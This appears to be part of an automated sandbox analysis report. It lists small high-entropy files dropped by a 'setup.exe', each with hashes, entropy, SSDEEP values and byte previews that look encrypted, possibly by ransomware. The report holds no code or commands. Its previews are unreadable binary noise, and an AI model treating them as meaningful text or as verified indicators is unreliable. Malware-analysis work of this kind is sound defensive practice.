              Preview:<?xml.8.P.,".s'=...g....tD.fS...x5C%.2%...dB..v.......5.....5....~..%.[2....w..O...!.a./....e.L..TTw....|UR<......:X.:Z.Su.....w....L.x....W...TRr...}.3.aYi.o./.u.f..B..}.[....m...:..m...G/X..g..vS..p......}$:^...?.!:..!:I....L.k...(1.\>..*./..%_......g.x). .'..O.e._.....s/.2W..C..............c...h.=5..j.dvoh.$..f.$.bqE[..]y..E.{......hK.s`..S..F..Z..4.....Y..dg..^ROX..G..jl..x..5...{......G.....".9...../...S....s.3j....= >X.fF...D.....U.]..{E.y5z..<...;.y.=..lr.....\.c..K.]ZI..}.8f,P.PNy. ...._.|/.&3...e/*...b.M}h.0..L.*.as.MeCz..=..8.f`L-...n.....l..R2.Y.C..FB.O...."4.y....C....q.0.'..P.U};?.H..hym.k..........)d....:.....v.K.'...a.r.BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.739185344853599
              Encrypted:false
              SSDEEP:24:1LV8ki+jeMI2Ln1RXEQ1qh1reFYpmIMYNlZWbD:I+jeMlj1RHa/sIED
              MD5:074E463C8A20625BCC0CE36535A963FD
              SHA1:A3AEFC4ECD7EFD2F3249697B9C01F6A2F510D807
              SHA-256:F4F494B52C007755E0EB9DF5AFBBA9A36EE0AD27914A63D1BBA09924EF6479C1
              SHA-512:BAC02AF7BB910F269F15EAB27A338A7F55C1116E0F0B338FC0DDCA5B2914593F447B081407BA46CE55C5AD71673AD860F6AED548B2C9E77F81A97929C68FC224
              Malicious:false
              Preview:<?xml.'..9.....K.....A....^jB..E.....F......z.b^%.2.h.A.`..4W=...0....4...././..<%.^..{B..6.]9Q&....Y/....X...=.I6n.L8..J\V._Z)1...Rl==.8.A)Z-2......E.9.......'.*"O.#.,._#..@.F6.\...........GS....)...J..o.I..>.m...)....F....+h.x.....F.....I^.E.x.V...0.=.4..tu.U...K.&.?..M..w{.....Z...{.......1*2Nf.6n.f"...1..(. ...1..<%.@..V@g#o.p.H.k...*...u..;....6..'S....jm..e.u.o.A.......l...>..#..v.D.M.w. .M.Q...1z.C.I..m...-.?..$....$..*.di...g 6)....(..{....}....).k..L.?yJ...f..../.%... {fX.:......@Hv..r...L\dB.W0-.U..M$.......3:..........z...O.M......v.7.C..(?.P..s..4d.[~.._R....e..5 .\.n.n]..G>.......W..ZT.#I.?..MM"..,...D.g.^.V.. =K.....y|....t[.s....a.U.X.....z.>A..hP.;{.......EtLHg&..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.728176204817547
              Encrypted:false
              SSDEEP:12:Hf5hZflujzNJjP5T4OFIfA3fMFIsrwRU4uM4iql9oCT4wvYqMqxM1sMR2cii9a:HxhZElJDyfafMFIsr2SM4iqQQ1FbD
              MD5:AF28FAFBD5A17EBFCF7836478FAD06BE
              SHA1:ED22BB565C210222733DBEE2A36C4FE3B6047266
              SHA-256:7100153F12CE6CAAF265EBD45F7A5E7401E357ED6C9E46E3B001661800CE0987
              SHA-512:9FCCDA20E29F647FB7F2879DCBFB9E4DD871538602C1D921B703A39EA39EB77631D2D9F2BC786696C8237B4DCEE0031B6F97A6AC550E3B22F1DC7B9929D6B35C
              Malicious:false
              Preview:<?xml~N...w......1....F...x..3.yi..r..n.'...z.......%U.B..<bS...A[...u....&..../...&......U...i.V..l........;..O......=.<...'..-t9F.s.a.....{...@..p.Q...Q........d..e..uy.>.o..5-..*...w.`p..7.R.~...tcn.yFv.s....t.8.crK4...b.v.....2....q9...}.....W..v....!..#.. <..+M..V.Q.y...6..1.m.._..../..N._...7.1.....~!. V.8.......Q..N....+..Q.n9+..~%..+.60`a...%.\.F-M........}...9@....=.....Vg....@a......8...ekC.9.9....S.y05..1.....X..f|..........A.......#i4I.j....*%.e..tc..i}!..k..S...S......j,a..,-@.Z.;l/..6R....>i.t...'T..y2.........l....C..O..@...O..<5 .a.......t..8"l..gt...;..q!J.l(..s...E.ubt.J...{:.q.>.....B......E._......32;.r.......J...p...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.755056683429762
              Encrypted:false
              SSDEEP:12:z8CB17NshwZVKvqQxMWJcTQoJ748Eor9N4p/2InxhyLpfJaOwfunS8dsMR2cii9a:zNVZVKiibQQoK8/Oes/yLpBaHmnHabD
              MD5:1728206920A56E9A3A314C9CDEEC66EE
              SHA1:941E13760FDA061F3B1DB1B69DCD0D42E848D8B8
              SHA-256:AEBF6B8BD22F6107EBA3578A5092007EDAA48E4571527FA2D9A50E3A758E37AC
              SHA-512:1FA332F00ECCFBFCEAB565CC9F7E5A13D8D148774EBB7CFDD9D561F3F46E52B07DBE406F6BC2160E91479FBC8DEF46F29F04F47D660A904DB147773A67251F1F
              Malicious:false
              Preview:<?xml.l.w...x r.F.J,a#D......Q.>$.?...p..@..l4.w5D..o..$.|.SXL.TSiW..T].-..)...K.M.,.J..K.w..7.hX+z.W._>.o.?.....|m.w-...&...O8"\..~U)h....N.*..[C..t.=LE..U.U......J./|.....W..cJ...f...G,...0.....;..*...........7G.*..I.{..q.{7.J*.Zy3R......R.:.9b..'x....I..h..2..QD.#.G.V.k..O.)5.....:.i]../.WBoH...Q!...]..I?7=C..wc..b....W..'......hc.6.....0,.f......#.b.Kv7..I.w......."i%T0#.r.E\......m.....S.E..X.1Y..mo.... .3..&z.S.."r?S.._.f..o...pl>...x*.n.}...RU..k..K..O...........Z..6..f.7...XBd.:/W.Z....Gc...5.'.i....Y.....#....X.J..d...Y..-e$.L.,;j..f.....g.....<.P....$........C.PO...F.x.[Hu.x...MQ...@*.."n...K.S#.X.\t+...|=:.Sv.m.....o......7...0x-.].v..U......e...|.(....0K.....Sm...}Z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):756
              Entropy (8bit):7.667397815582402
              Encrypted:false
              SSDEEP:12:Ub2fIsCUNN6QVCTd8kegI4DhR+KaTm/6opDTXnFug5JfBC0sMR2cii9a:CXUNNZWiiDn+JyFu+wbD
              MD5:EF1972025962C902CA725D0E87AEB504
              SHA1:01E8AF0690619F116BBF4947E1C1ED7B94D50D7F
              SHA-256:332AE862E791BA1A3663CF986D88632B4B8EEC8E4ACF1C59D245EE7D1540395D
              SHA-512:61EA87ECC5D708227940D78E46EB52543F7F9C71CE489DC7B207021670565335602F645CE3052E2818895EB8D9A29F99840688FA5AEB1D85AE2CD8D35336D36F
              Malicious:false
              Preview:<?xmli..x.Pz..J.cJ......i%..7.....jH........,.J.......o........t...o"0..|..=....V..H.v...Y..I.....Q..8...-E.....X....f?....q;`..O..@R.+x\.b.Y.c...p.....C.^'..!Q...f...]..... .IE..j.v..[.&v..2..K>[...<..Y.Id\D\s...,...1.P&b....P5.du...VG.J...`..t.....Uv./n.Yq2.`........cH...sv.;I......x.W.MxZ..a1.....hQ...M....=w..To)....j?6..K..DQLq.\.... .T...H./...f^...o.....k..)..#I...Y...m..'8...uJf$.}.V......,|.f.]......Q.1..k......\...<.&..n..........`.....!.(..a......@..m.tz...-...+t...d..r........r......].i.Wj_5..Z`4z.qN.1.Wy....}<...Rw.[..;.....Q8.G.{.Q|....vz.N.......Mo.._=.H$...J0.Z..[<.i..&..r......K.i..x:..^cu../..K*..N.P.i.2t2G.q+...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):811
              Entropy (8bit):7.6791870535603515
              Encrypted:false
              SSDEEP:12:aMY3nm4Y1SWZWfCrNeHdWhmTPlnDY0eioX81AKOcUQ2OCRjgaXYsMR2cii9a:A3mYm7eHdWETN6f81AOipFgaBbD
              MD5:6DF19A3B3482F50373D3329486D81400
              SHA1:BAAA91ECB7CAA407642DF0C9C1FDA3857B414DBD
              SHA-256:32C53A99A0461460203154A3DBA0585E1A5E5DE4DDFF3313D93CF16D1F696FDD
              SHA-512:BBA90C65910B7461840E1E8733F0C3957E19E53F9C204A558E3A9671029944B9F87A745A6241AECDA27C2FF2889DAC37266D1441361BB2557FBCB9CE8415150F
              Malicious:false
              Preview:<?xml.L6&....>.......T....=.%i.)v..W....LK.q?..v..^8..C4.mp..o..7.f1....e'..`..hY.d.Q..c_..(7.. -%..^c...F..OT..S....IoT.i....@.\?...!zT...f<G.s.....O'M.h.......OF...:l|.O.`..W.......^.E....}".?F..}...LvYn.L=&@.aS...6.Z./=.P.=EDY#.}$...,.G..ih.n...r..l...T.0.].f..O...,.b....KA.1.=0}.,.@.t.h.i.u:PXz.^.'*/...F.S./(..=k.o'.v.A.Q......n..+[.i.:%.g..L..a...M.. ..;.....{........3...G../...n.-.X....,........FE..L.V.y.i..b...}}.Ofy.6..k.........+.x.*.x..8~[........q...=..l...#Sf..i.^.C..3..D.\......?.(t2l..IvhA.......f.............A.AX......I..4..s.4.O[..[.4......`.o..D...}.vD.9...xD.Tj%.a.m.$e..(gI.5....._y:m.Z.........H.h....o8...3Y..rp.`l...8Xf._.V.)..IK...*..b.S.G5'...a.U..>!.y.M.'.......p..C.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.689748733232001
              Encrypted:false
              SSDEEP:12:slKj1JzPoIk9q11VqtKiRl+uBqmhuDZ7owCeH4Mzh/zteXD+rAekqB16ArRCsMRw:VnzPliqw+WuDp7TH4AzECrAe3B15rpbD
              MD5:6C259C8155FC206A97E46DDE4B31F77E
              SHA1:695C95BDF793C7F126FF15C2B750F56A47F472D7
              SHA-256:29743A067DCD3F264D01578C17C975624471C012A3CA692C1072C7FDF883A83E
              SHA-512:C84A9E866E5108A366989963A97BA18E35EB3D2B085B5C5EDC83AC0429B591DB0BBD3BAFDA23D32B98EE73AAAB85DD3A710FCF9E6C863AB3D1C8EEFC752AC5C0
              Malicious:false
              Preview:<?xml.O..P/..igb.J..rL.....1-..i..T..`.;..P..&B.#H...LA.....2..)...J.(]F..I.|......9...._E......d..^..+=ah....G.kZ5...B..2.IW?...K..@....r..........Y.j......U/N.....7...I...................u,`..s=.<..~.>@....~.Y.:......{.&.=uN.].n.z....Q3k..{.-.p.8g.4T.n.c..2......pb.....nI.....`P^..Bo.....X.....K8..)Q.........6..r...d.j...I....t..Iw.ft..Km...g7...~[h..n(.N..-].c....V...C...@.q../E].v&4..%.'..z.d.Z.\.%..p..v.?......\y.>.......%.vo./....aD.-ip(9.....r\. .p..&..W....i.K.gS[".en>8.v..jW.D.'...o.^..C0.Q.z....g{.....w..n.p..FC..-.U.r..e)9LV..n..N....JW...p\\......U...j7.Eta...O.1..j...j..8.w...y..zl.....$[.a.....u.~o4..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.713768586549521
              Encrypted:false
              SSDEEP:12:UZkHCR32TS1/RimBG3hvSVpLpi+0VG7tkhuTS4LcFTR4vfhWNZT54ErRsMR2ciik:C5UTuIm+SXLyVGMfFFl44ZTCbD
              MD5:8190C9764D246AFD9A854FFDBE75A5A7
              SHA1:09096A1ECE17C7888D06C246FF61463E61DF077A
              SHA-256:344FC294F36C252F8D2A194CF7805AC27EA7B34DF8AD0ED7F54ED74A52F745BA
              SHA-512:7A833D0CFE3234B60D93C1F512ECB63D13F54681E4A89DC281EBC6F6476B467C5EEE6D3DA5D783FC719EA8F82A9AEFEFB31D09F3F22658F26DAD7A9DED64422C
              Malicious:false
              Preview:<?xml)M.........}..{.....|.4....pB..G.....>.@.V..@j...AR4]U...;Z._Oy.\..u']...oC...F3...(....-......x.....M{.E?..U.F.".E...nYC..vg.[..EhX.KE.<......1....+V.r......P..p?x=<(^...T.\#.+G..U..z.....RA.T.z..u....jR.a.F.=b..2q,..1,B..`.........9{.$......h..@D-....QQ.......n...se..b._$.-h....y.../.....t.?.....@.V.Y?...d.(..q.h..nLq.6WD..A....0...1kS!.}I..&.d..?{A..Q.!.C-M@;t..4.(6.<Z..lp......3...X$.\{..a.zC..4..>$..Vy..B...x.hU ./.B.x.O.a..K../...*R..:........S.U....Z..\uCwy..6.1R{.......L.:.D.l.P.6SX/.N?e.X.O..Iz...R..O@._7.O...|.#7r.m.L.t..G..z3..bz.j..:.....cl^.g.?g:{.*..7.i..}ZBC>..uV..s...j.....l.Ve."..+O.=e....8....v.c.a...i...X........q..{..0v/....M..7... .7...T'..w.....~UVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):733
              Entropy (8bit):7.724702426229525
              Encrypted:false
              SSDEEP:12:AIpKuL1Dd6VyIlxe6rfZsOEm0VPxA/lHgJsMBP4bNl8QpqPWzPjAHPRSt8E/0mNU:hpXLeoa4gPERVJAd1M90EGWajPagibD
              MD5:48F4EDC4ACDB99EEB7861827BDCA1020
              SHA1:3D6CC1710FF66E062EA585CD947B878FB52C3FDB
              SHA-256:C8FE4A005C207B3ECDFCB59144FF81919A8C9B5FB94189FAD4B89931BB7C9DE7
              SHA-512:4F87AE131907B98756D32852DAA604DD161E2CB3A95B800A4F9DFF2F7EA7C2BD4B5AC1EF557D25AEF440A4E33A88D4BA453850AC8E387CC08ECD83F4E7C174D1
              Malicious:false
              Preview:<?xml....h....*6.....mS.7..E........%....r.`..1m....$k3b..ud)..m....).....f....oR.......7.(.n~......7w..\.:gk.......p.4.....O..e...%r..e..0..yzL..P........B:..a.N.w.G../.J..v].......U!./...../$...&.......>@.A......X......'%'*.:.|.t..S.]..O.J_.`e..~=.E.T...........~....>M.1.a.....9.+.......,&W.?....."...~X:..O.T6j.bW..7..5mI.(........,....|... .."....[}.3I....g2.s0....0...h.=.....vRM..|.AJ7C..m.<.C<...d..O...r.*...hVP.^..G.b...[.Nm1$.&.....G...%.....6.}.|....xL.fg.p.b ...X"..Oyx...F.....!.Q..8e1..B..I.u.%y.9a..p.m..%..b.d....a0.G.....u...i.^.C...]...(...O>X`.LS+...g......\..ge..A.u.].Wl..C......x.[.H.o@..d.V..f..:.>.gVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.76759853853482
              Encrypted:false
              SSDEEP:24:HC9b4RM6sBnBmG+sqpWGJHuslVStkf7M6slt2bD:iZV6+BNJ6OslVS67YOD
              MD5:3A52B8F8A883BF4A78480FE0EA9B90B6
              SHA1:D9A74BDFF3F64D8223AE01ACB5F606F35BCF6BD1
              SHA-256:F52A0410E5E3DFF555F2F4BED9F1E360B812BDE41A64BE3A932DA4DBE287A91C
              SHA-512:9E020BFEE1C28E2AB30B2B7D60AE652287F030C392401CC048D91F8987837C26AA39F2F4561C8C8CE2559674F627EC248520DBA13D123544D2C1BE16F09FE19D
              Malicious:false
              Preview:<?xml...n...&...d.$......(Q...PT.U.{......\....TN..J...q..?.r.'....XLLLp.e....^.....);.......%~....n....g3.H..U.^....<aW..W.6....Z......6...TuR`..F..S..3...X....j.......E.][.....]k_.2.Yn....YB..q.V...F.....f....V..|...$.m.y|vc...yk..h.\6\....5.\'.rd+..d.F.W0.\....q.......X..d.WVn}B.@].A....}..[Yk...I..*..d>4Yf..W...A..E......._..V...4.....(...mR.E.{....V.t...y.!a.g..]..Y?.'......r.z...!#p>....m.[.....A:.l..i.N.........l.....g.5.$...|r...M/.^....<ao.Pk.C.I......S..K...-w...........};vn.....^6^..I.0P..?.sO.O..i...7....q'..%.t..ys(...1k...s..c...0K..3.../1.n.lq.......i.1.g..<.E.{T...:E..).P...o..hUG..&#&..W.P[K.....A..z.......UWh.,.......].m.{.x..1.....O..8.VjB3.........wj...u2.H...~..'2VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):758
              Entropy (8bit):7.682671802155452
              Encrypted:false
              SSDEEP:12:1yl3Qha6KV2s6pZtPTm1pU1phaw5RGklP2L25vnuBOZtVZ5naa9Km7g5cQxDsMRw:KDo/PlTmjU/1KklPsIQta977fAIbD
              MD5:874AFB5AE8B17FFF519C9207B4C3462C
              SHA1:551F2E326DA11D1012623626E80DD4C170DE4D78
              SHA-256:DCEE89C20897E25540E36C4C074B95D4F7C745611BA92267597B41185D551A1D
              SHA-512:D6862598DCD111744F6B061EA5C71A080A5046C5ADF775F86D59A7CE1C08BE3926F786E6ADCE35B8685292D3389CF2979C25D73CC4559EDBDA97B739EACAFBC7
              Malicious:false
              Preview:<?xml......_m]%.<i.n.T._.,.LB....?.9<.4.^.=z..l...M..i..&@ifG.i3..3^Xa...J=........B.h.9nD4_W.V?M0u.^8...M.z....A..G....}........K..`e.O..aZD..2%.d>.Ay.O..u..|d...o./;.d..+ki..Y..<h...[e.?...z...%J.G:.q7...=.....l..*...*m....*...v....C.....p..TVL?4..#.).6z0j....E..o.S...Q.'...^n._}..rO.......j>.G..E .. G...{....AM.K..{L..F..9Q.{L.S.....Dq.srW(a.a.2G...1.....ar<...B.".)C =.jJ.j.. ..R.....{K<.,.}q.p.6.e.j.0q.;L...6.^.X..".ow@.<Pkms...D.B$.un]..W...!..@.A.|s.L"..4.Q[].Q..P....a!".p.>?g..^.....n..._".*.....d.W_.F.`n..QgY.*.M..<.....y y..sn/,oQ....z.......n.m.|.J.......dMCw...1C`.._H_5..O..y..z.S..........$G;.\.........M...*.$a.hp.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.755270293147737
              Encrypted:false
              SSDEEP:24:Xx5xJbB+rDYgmf1SeJXPvATSszaCjBt80IhbD:h5xJgD9mf1LJglBq0IxD
              MD5:F3608D0946B40B056898002DF6E07FBB
              SHA1:D93B752ADFA5DD4982979111DE2E5FAE3D4F29C3
              SHA-256:5DB50C69B61BBD8CC58DA019BC48F3B7150FAE817BACB3E411AE9876E8840DC0
              SHA-512:F690C2D5112FD26707CBD108229FB73CC7B81CEF20E586E946C2CF05557ACC0BB8A57D0CBBEE0CDF0F4D26DBBD9EDA2F7B2E0097DFE088AAC98D114333BBD310
              Malicious:false
              Preview:<?xml:.L.I.~fR>.CH..H.s..a.......>..P....cW Wfh).Q.......d.}.V"..l..;.]*.L4aU....].P,+.^.-..3..h.vTQ....z.{.....5.!.I........_..4...P...Bv..,.'......."j....D9.....>U.qq...9^.,..:$o$..a.9.. C~.H..4q.. .B."n...r".....&....]..7..*.\.......&..|.}zG^2....xU..Z.N..j..Z.im</.n..Z..i..t,...".......$b...Lb...9q.."......'Pt5.m...lE.%.._../EM.A...-..`T..{......p%...N..._.SjX..CgcR...\.QY....K.V.}/..`.>.N..0.\.G..-......"...qfeQ...w.P*|f._L_..U`..9.(.c.&. .n...?U..s..].. .0..NT=-..%......w.%....*F..QN....2T.......i.1.').l_H...|...P.?I..>(6u.7L|l..".:....:....[s8..<.........+o..W_]...3].7&H....h.,.Lw...q..N.h.4.<]..r.g....(...[.2.H.d.0.~..S.~..?4...TVlr...`...<....<....q.e..=.!.u...##..W...n.[?.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):781
              Entropy (8bit):7.70510324446999
              Encrypted:false
              SSDEEP:12:wawrAWJzSVxVqis1pVccUcNezNpLmS81FfYpGA57cR28i0yzsMR2cii9a:O1zycis7KCMNlnEFQpT57P0yYbD
              MD5:844F395208CC4DC39EA18433D2A5DCD8
              SHA1:75273279DA5800982ABFC74503C2198066DCFE4A
              SHA-256:6FCC161588CBB13326CF3A1E88B342A3BDD2FC2F824A48CBE7E8C971702766A6
              SHA-512:4FB3B60C72B6AC36813343BF1DDEA6EB47458E5B4493E9E61B3054A0AFF82C4B93957FE85D751F867F5D9941864108F2B67FD5381D945275293D12F78182A2D6
              Malicious:false
              Preview:<?xml...;.~....o<..O.*..T./.....2..Q....h..e.....J.K..].?[!.P.G..)EO.:.P.U]~. ..K.....O......j...0.&h[mX....G.l7..yW*|D06S....w.S...*.%...#..^..N....H.3..r>....$@.K..;|.*..._..I....$bk.6.f.P..y.C.d....p.)}.s...V%.tw.6.R.4..B..%.....7.X...nfi...K.......rb|"wjR.~.74l|l...V..d...q#..y.......H.9.b.w..p.8.|...h..B.C...Z...(..HK]Z.k...X....|...-Wl...C......mVk..b.=.....I..?.....E)A.f.}).xS?).R.sI.n..22..y9,....I.1..q&..R..BM....t.7..a..4\....`%SJ....F..Ln.6Zb.....+a....U..5...U1..U....F*y'.2.eC..&......on.OD<..3....RSo..>......I#..5.u.4....'*..0v....]....]G.o.&.gL..<V.t...O.#.5. .|6....t.y..".k~c..S.L%FB..;*.2...4Z..%....z.q....\.....?..>...G...3#+...F7...s_7K......s.&s.|FVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):824
              Entropy (8bit):7.681878880335779
              Encrypted:false
              SSDEEP:24:wrq7LzNqkJ5h+8SOC78FCUJEMixc1FQsG0bD:XfzBJ5h+16FCys21FQsGeD
              MD5:1E0F2019FE6D65EFE8EA64F226AB6077
              SHA1:065001C4CCE119B0767F1DD3151F92C98E3CF5CB
              SHA-256:3ECBEF7DF848FD5850952BDE2646940187F08DCE73CE430E2F1C6F6B8E7C5488
              SHA-512:55AAFF51BBB21872976F097CCB2AB7785C6B8DDB31FAE0FD20E457C26E60CBDA97ED1F8A3AA0A16663984398822D88E6AD8508B4FCED94AE7E7349740CF91BF1
              Malicious:false
              Preview:<?xmlq..-.q..t`..R..Q....D.0....H.:.^..,@"...@..HKD..9.q...ob........<.[%...4.`......S..B.R..J..!v.[.......m3......N.).<}...u.....1.Yq......j._\.z.rG].t..G./........m.m$Ld.0CJ@@r{...I.;K.N....T......7z...p../XZ.)...,O..e.8....pM...&.....!_2ND....|.:.7....BW.[j..J[......naN....j....4.H.q.......5\...u-.f..#.;.....1.4....o..M_...:@..aKa1...%...n"...3o/?,).U-...S(...}('....lQv.X@..[.{6^..d.u?.E.3...:n..~..T....V|.......p.6...).fr..N7....$.7.3.<9.8^.%W...e.%ID.JhS.d.P1!.~..\X......./..,..elq..z...`.0.-.H.]4.K..V`X!F.B:.>$.1.._....>8..U..)..m.P.. .g1@...$u..:A..ej|.$b$Z.:.T4.....[....!&.{..........(.0`.8....-...:.2.p..F:,.?$.q..L.....wS,kn.\e]R.k)....H..!.L....-.h.I...c=.../tu.<..}..I._.S..R..C...$!.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.687536014688457
              Encrypted:false
              SSDEEP:12:HyI0ZzyVLjpBSQ/6xYs+IY1D1qBpPSdWaK+wQd/spT3BI+fOZEcDrWb+bssMR2cq:S9IVL2Yss1D1i4WaKzPnI+fOO+rWWbD
              MD5:32A3C6035C22F1AA5F694C160EE99830
              SHA1:4123FD2ED8B5A7BC2E43FC1E3A8990B7A4661017
              SHA-256:D76F92320C2CC3C74E6E76464376A73EE58B3BB492B71E114A46C5E19033ABB5
              SHA-512:854D829D28E3EEDCA6DCC05E65BC3AD6ECBB0A1964B03A56BF4A93B30AC2331E3F5869C45A32688D62DDB30EDD6D71FD06FFB933ED3FA8CDA9BF69D75A793CD7
              Malicious:false
              Preview:<?xml#.-w.....d.g..h..B..?_ HZ.lLy..5...Dr..Z..B..!e.b....{B..RV."_r...?...Y-.M..ae'.D...F'..#....T.D..F(C.*....o%m.e:.d~2..r!.7{J.U3...v..S1.|..D..`.;\*j...ENDz......+.2...q_._.L...."....6.....-...#&..\.!9.I..Vr.B.NJ.h.>.BHK(....j.........c.K...`....).!.U..z#..&....%V.G......[..}....mR..o..-.D...Jt..cJ...ksnX.[A~i...}.M.+U.).......A/)1...~D. 1.8.s).L._C...-...e6..:=.p0.~...3...PYe<.....oT...)v...b(=.c8....L..t.=....m..eka:ZT..~.....39....|*0....{...i..E.1R..g...z...|~Lr.L......udr.k^...!....2..A..5.XN...8...M...v.@....H...p....oT-.}..eH.Ds..@.<......r/.!-..{....b........Yy".....e.....H..w...vs([)O.`.zt.@.h.Z.f..}B.X{..0Ja.P.uHiC..x..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.707332354936555
              Encrypted:false
              SSDEEP:12:JfHkEtI4uqbS7o4uz+YWnOVEmMkNrB+q7KAOq+FBhRUrlzhwORFLLtzsMR2cii9a:JvkEtI4uqe7EimMYjKvqohWzhpRrYbD
              MD5:F40FF7858AA80B4289C89E3245C85F65
              SHA1:7383678E560440A8FB6A9015F7A41F556B3D6304
              SHA-256:CFE3A2F00CA6259916FEC81870141BB79BF1424E535B128AE8E85089CFB3BB0F
              SHA-512:8FA5AA6DCFEEAF9D57EE5313CDC959BB176521836AE8A6131C297076DB329986F5459EA818FA99E6B482A5FA88E0B2D5FC5D68B2164E5A6B3D845EB6B00BDA80
              Malicious:false
              Preview:<?xml.g...OB@.'[4...u.....@f.'..?.u.t3....x:....,dA..~e.0..`Wn...n...T`.......W....".....;<....X4....Z..d..=..?....l......W.qj.E...g....e.\:.Y.\l...-A2....2W..p...^wZA#..O.>.9.K.[..+.#2.{uaeo...%3k....s...%-}.<rqE...gX.v$...9E....b.s..P....X...U1{a(.K..0.S.olk...e.w._.)blM...>.4.} .Q9........=N......u..'7..{.u.av>..rKE...C..pZ....7..\..lkA..eZ..To..UA"g]..@."jl.i.hV..f..|*f..+S...G5T.P.q..GN.`u)`2......-..A...j.<O.!.....<T|.|..`...].,V.{c|.B.D{.bef.u2............[x....].gq.7e....vQ.@.}A7_..E...a....(.........H|.Y..i..U..f...E.._.4..&...y.;'..H..k...S.VA....$.....r.+..K........r....;'$.t..n..E.O.?./..`.& ..QnHv..:,.*...E.1.....].5u..>pv...]..$.XN.P..{_<}[:.'....4....y0;...t.J..t..$.].t...i|.(.O..1^VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.723244782265647
              Encrypted:false
              SSDEEP:12:Av7ZnSZod+66MzOdSX9jcH1NnE+XshqTvgN5ZBPN3y/0mT6t6L9CWPOAUEUosyxR:Av94bJd0gaUs8Ty5Q/BT6rWPOOUCxxjX
              MD5:D8B984178C31D0F05BA60F4FCE95C97C
              SHA1:74112B6295AE679E30B9CBE2DD4689EFCEEC7FB9
              SHA-256:9CF8E9A17701560BD311DA87D02A898471845E5B3892F15E6944AF7AB7272D78
              SHA-512:C2B46C85E4F3A30279F9A057199A19EF1C3E9F1ED5FA0DC3A19905C1A6700795FD52E88A597F02A90E7C1BA9A420E0421CACEAB56DCA505B37E11580ECEC5FB4
              Malicious:false
